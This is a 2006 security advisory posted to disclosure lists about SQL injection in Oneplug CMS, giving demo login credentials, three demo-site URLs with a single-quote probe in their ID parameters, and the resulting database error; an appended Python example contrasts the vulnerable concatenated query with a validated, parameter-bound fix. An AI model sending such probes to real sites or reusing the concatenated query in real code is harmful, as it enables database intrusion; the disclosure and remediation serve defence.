From: preddy
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Thu, 05 Jan 2006 18:28:08 -0500
Subject: [OSVDB Mods] Oneplug CMS - SQL Injection

Oneplug CMS - SQL Injection

Vendor URL: http://oneplug.com

PoC:

Login:
Username: demo
Pass: demo

SQL Injection:

http://demo.oneplug.com/press/details.asp?Press_Release_ID='
http://demo.oneplug.com/services/details.asp?Service_ID='
http://demo.oneplug.com/products/details.asp?Product_ID='

Result:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Service_ID = ' AND Session_ID = 209'.
/services/details.asp, line 15

Preddy
RootShell Security Group
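Added example (not part of the original advisory and not Oneplug's code): the error text above shows the request value landing directly inside the expression `Service_ID = ... AND Session_ID = 209`, so this sketch puts that concatenated query shape beside a validated, parameter-bound version. Assumptions: SQLite stands in for the Access/ODBC backend, and the `services` table, `Title` column, sample rows and function names are constructed for illustration.

```python
import sqlite3

SESSION_ID = 209  # value visible in the advisory's error text

def make_db():
    # Constructed sample data; table name and Title column are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE services (Service_ID INTEGER, Session_ID INTEGER, Title TEXT)")
    conn.executemany("INSERT INTO services VALUES (?, ?, ?)",
                     [(1, 209, "Hosting"), (2, 209, "Design"), (3, 500, "Other")])
    return conn

def details_concatenated(conn, service_id):
    # Assumed 'before' pattern: the request value becomes part of the SQL text,
    # and the driver error is handed back to the client.
    sql = ("SELECT Title FROM services WHERE Service_ID = " + service_id
           + " AND Session_ID = " + str(SESSION_ID))
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return ("db-error", str(exc))

def details_parameterized(conn, service_id):
    # Hardened: accept only a short ASCII integer, then bind it as data.
    if not (service_id.isascii() and service_id.isdigit() and len(service_id) <= 9):
        return ("bad-request", [])
    rows = conn.execute(
        "SELECT Title FROM services WHERE Service_ID = ? AND Session_ID = ?",
        (int(service_id), SESSION_ID)).fetchall()
    return ("ok", rows)

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "'"):
        print(repr(value), details_concatenated(db, value), details_parameterized(db, value))
```

The same two controls apply to `Press_Release_ID` and `Product_ID`: reject non-integer values before the query and return a generic error page instead of the driver message.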